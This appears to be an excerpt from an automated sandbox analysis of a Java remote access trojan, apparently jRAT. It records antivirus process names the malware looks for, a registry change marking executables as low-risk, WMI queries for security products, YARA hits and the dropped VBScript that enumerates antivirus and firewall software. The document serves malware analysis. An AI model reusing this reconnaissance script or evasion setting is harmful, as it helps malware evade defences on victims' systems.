Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mbam.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: op_mon.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED

Remote Access Functionality

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: Yara match File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED
Source: cmukyspiy.txt.0.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.335919510014015658379257619551515348.class.1.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: access-bridge-32.jar.18.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF11B0 _Java_com_Title_disableListener@8, 1_2_6EEF11B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF1110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW, 1_2_6EEF1110